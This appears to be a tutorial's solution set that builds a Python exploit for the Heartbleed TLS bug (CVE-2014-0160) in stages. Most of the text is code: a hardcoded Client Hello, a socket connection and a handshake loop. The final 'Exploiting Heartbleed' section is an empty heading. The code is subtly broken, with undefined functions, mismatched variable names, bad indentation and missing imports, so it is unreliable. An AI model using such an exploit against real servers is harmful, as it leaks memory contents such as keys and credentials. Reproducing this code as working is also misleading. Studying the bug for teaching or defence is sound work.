=========================================================
Exploitiong CVE-2014-0160 Solutions
=========================================================

---------------------------------------------------------
Build Your Command Center
---------------------------------------------------------
.. sourcecode:: python

    __version__ = 0.0.0
    import argparse


    def build_argument_parser():
        parser = argparse.ArgumentParser(description=f"""
     ██░ ██ ▓█████ ▄▄▄       ██▀███  ▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄
    ▓██░ ██▒▓█   ▀▒████▄    ▓██ ▒ ██▒▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌
    ▒██▀▀██░▒███  ▒██  ▀█▄  ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌
    ░▓█ ░██ ▒▓█  ▄░██▄▄▄▄██ ▒██▀▀█▄  ░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌
    ░▓█▒░██▓░▒████▒▓█   ▓██▒░██▓ ▒██▒  ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
     ▒ ░░▒░▒░░ ▒░ ░▒▒   ▓▒█░░ ▒▓ ░▒▓░  ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒
     ▒ ░▒░ ░ ░ ░  ░ ▒   ▒▒ ░  ░▒ ░ ▒░    ░    ▒░▒   ░ ░ ░ ▒  ░ ░ ░  ░ ░ ░  ░ ░ ▒  ▒
     ░  ░░ ░   ░    ░   ▒     ░░   ░   ░       ░    ░   ░ ░      ░      ░    ░ ░  ░
     ░  ░  ░   ░  ░     ░  ░   ░               ░          ░  ░   ░  ░   ░  ░   ░
                                                    ░                        ░
    Version: {__version__}
    """, formatter_class=argparse.RawTextHelpFormatter)
        parser.add_argument(dest="domain", help="the domain which you wish to test for Heartbleed")
        parser.add_argument(dest="port",
        type=int,
        help="the port which you wish to test for Heartbleed, default is 443",
        default=443)
        return parser.parse_args()


    if __name__ == '__main__':
        args = build_argument_parser()


---------------------------------------------------------
Handling Sockets
---------------------------------------------------------
.. sourcecode:: python

    __version__ = 0.0.0
    import argparse

    def hex2bytes(payload: str):
        return bytes.fromhex(payload)

    hello = h2bin('''
    16 03 02 00  dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
    00 0f 00 01 01
    ''')

    def build_argument_parser():
        parser = argparse.ArgumentParser(description=f"""
     ██░ ██ ▓█████ ▄▄▄       ██▀███  ▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄
    ▓██░ ██▒▓█   ▀▒████▄    ▓██ ▒ ██▒▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌
    ▒██▀▀██░▒███  ▒██  ▀█▄  ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌
    ░▓█ ░██ ▒▓█  ▄░██▄▄▄▄██ ▒██▀▀█▄  ░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌
    ░▓█▒░██▓░▒████▒▓█   ▓██▒░██▓ ▒██▒  ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
     ▒ ░░▒░▒░░ ▒░ ░▒▒   ▓▒█░░ ▒▓ ░▒▓░  ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒
     ▒ ░▒░ ░ ░ ░  ░ ▒   ▒▒ ░  ░▒ ░ ▒░    ░    ▒░▒   ░ ░ ░ ▒  ░ ░ ░  ░ ░ ░  ░ ░ ▒  ▒
     ░  ░░ ░   ░    ░   ▒     ░░   ░   ░       ░    ░   ░ ░      ░      ░    ░ ░  ░
     ░  ░  ░   ░  ░     ░  ░   ░               ░          ░  ░   ░  ░   ░  ░   ░
                                                    ░                        ░
    Version: {__version__}
    """, formatter_class=argparse.RawTextHelpFormatter)
        parser.add_argument(dest="domain", help="the domain which you wish to test for Heartbleed")
        parser.add_argument(dest="port",
        type=int,
        help="the port which you wish to test for Heartbleed, default is 443",
        default=443)
        return parser.parse_args()

    def main(runtime_options: argparse.Namespace):

        socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        logging.info('Connecting...')
        socks.connect((args.host, args.port))
        logging.info('Sending Client Hello...')
        socks.send(hello)


    if __name__ == '__main__':
        args = build_argument_parser()
        main(args)

---------------------------------------------------------
Waiting for a Response & ``recvall()``
---------------------------------------------------------
.. sourcecode:: python

    __version__ = 0.0.0
    import argparse

    def hex2bytes(payload: str):
        return bytes.fromhex(payload)

    hello = h2bin('''
    16 03 02 00  dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
    00 0f 00 01 01
    ''')

    def recvall(sock, count):
    buf = b''
    while count:
        newbuf = sock.recv(count)
        if not newbuf: return None
        buf += newbuf
        count -= len(newbuf)
    return buf

    def build_argument_parser():
        parser = argparse.ArgumentParser(description=f"""
     ██░ ██ ▓█████ ▄▄▄       ██▀███  ▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄
    ▓██░ ██▒▓█   ▀▒████▄    ▓██ ▒ ██▒▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌
    ▒██▀▀██░▒███  ▒██  ▀█▄  ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌
    ░▓█ ░██ ▒▓█  ▄░██▄▄▄▄██ ▒██▀▀█▄  ░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌
    ░▓█▒░██▓░▒████▒▓█   ▓██▒░██▓ ▒██▒  ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
     ▒ ░░▒░▒░░ ▒░ ░▒▒   ▓▒█░░ ▒▓ ░▒▓░  ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒
     ▒ ░▒░ ░ ░ ░  ░ ▒   ▒▒ ░  ░▒ ░ ▒░    ░    ▒░▒   ░ ░ ░ ▒  ░ ░ ░  ░ ░ ░  ░ ░ ▒  ▒
     ░  ░░ ░   ░    ░   ▒     ░░   ░   ░       ░    ░   ░ ░      ░      ░    ░ ░  ░
     ░  ░  ░   ░  ░     ░  ░   ░               ░          ░  ░   ░  ░   ░  ░   ░
                                                    ░                        ░
    Version: {__version__}
    """, formatter_class=argparse.RawTextHelpFormatter)
        parser.add_argument(dest="domain", help="the domain which you wish to test for Heartbleed")
        parser.add_argument(dest="port",
        type=int,
        help="the port which you wish to test for Heartbleed, default is 443",
        default=443)
        return parser.parse_args()

    def main(runtime_options: argparse.Namespace):

        socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        logging.info('Connecting...')
        socks.connect((args.host, args.port))
        logging.info('Sending Client Hello...')
        socks.send(hello)

        while True:
            header = socks.recv(5)
            (content_type, version, length) = struct.unpack('>BHH', hdr)
            handshake = recvall(s, length)
            logging.info(f"Received message: type={content_type}, ver={version}, length={len(hand)}")

            if content_type == 22 and ord(hand[0]) == 0x0E:
                break

        logging.info('Handshake done...')
        logging.info('Sending heartbeat request with length 4:')

    if __name__ == '__main__':
        args = build_argument_parser()
        main(args)

---------------------------------------------------------
Exploiting Heartbleed
---------------------------------------------------------